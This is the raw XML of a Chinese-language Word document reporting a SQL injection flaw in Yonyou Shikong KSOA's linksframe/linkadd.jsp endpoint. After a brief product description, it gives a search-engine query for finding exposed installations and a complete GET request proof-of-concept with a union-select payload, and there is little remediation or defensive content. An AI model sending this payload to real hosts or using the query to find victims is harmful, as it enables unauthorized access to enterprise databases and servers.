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351BC" w14:textId="4B32E0F9" w:rsidR="003825C7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用友时空 KSOA linksframe/linkadd.jsp SQL注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47836D5E" w14:textId="77777777" w:rsidR="003825C7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0" w:name="zPCck"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞简介JSESSIONID=F2DDC2FA64DACE5E220D588564592DD0.server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18078159" w14:textId="77777777" w:rsidR="003825C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u7f24ee85"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">友时空KSOA是一款专业的企业应用集成平台，可整合企业各种信息系统和业务系统，帮助企业快速了解业务状态和动态。 通过用友时空KSOA，企业可以通过自定义关键业务指标，实时监控各系统和业务状态，并通过分析工具优化业务管理和决策支持模式。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9F0C5" w14:textId="77777777" w:rsidR="003825C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="u725aeca3"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用友时空KSOAlinksframe/linkadd.jsp接口存在SQL注入漏洞，攻击者可利用漏洞获取数据库敏感信息，甚至获取服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996B3AB" w14:textId="77777777" w:rsidR="003825C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="u2c5a38ae"/>
      <w:bookmarkStart w:id="4" w:name="ud8f8d95d"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44EB46CC" wp14:editId="1107C918">
            <wp:extent cx="5842000" cy="3121437"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="487286350" name="图片 48728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32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5779BF0" w14:textId="77777777" w:rsidR="003825C7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5" w:name="uFht2"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A6008E" w14:textId="77777777" w:rsidR="003825C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="u76d38684"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤一：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用以下搜索语法获取测试资产并确定测试目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13703489" w14:textId="77777777" w:rsidR="003825C7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7" w:name="QMeB7"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>title="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>企业信息系统门户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</w:r>
    </w:p>
    <w:p w14:paraId="529C2371" w14:textId="77777777" w:rsidR="003825C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="u680cefdb"/>
      <w:bookmarkEnd w:id="7"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤二：poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B087E51" w14:textId="77777777" w:rsidR="003825C7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9" w:name="GInzp"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456%27%29%29%2Cnull%2Cnull%2C%27 HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: your-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: */*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Connection: Keep-Alive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2C238" w14:textId="77777777" w:rsidR="003825C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="u28ede241"/>
      <w:bookmarkStart w:id="11" w:name="u4d16f792"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72BA4E0B" wp14:editId="70510244">
            <wp:extent cx="5452534" cy="2863040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="497261700" name="图片 49726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534" cy="28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9419B2F" w14:textId="77777777" w:rsidR="003825C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="u2b45a7fc"/>
      <w:bookmarkStart w:id="13" w:name="u9ba730c3"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ED0D7B9" wp14:editId="5CF0B922">
            <wp:extent cx="5842000" cy="1927660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1433029388" name="图片 143302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666" cy="21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</w:p>
    <w:sectPr w:rsidR="003825C7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825C7"/>
    <w:rsid w:val="003825C7"/>
    <w:rsid w:val="008D0AA2"/>
    <w:rsid w:val="00C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C9BD"/>
  <w15:docId w15:val="{CCE1C044-7A9D-4F00-A436-8139F50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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-27T13:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T13:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>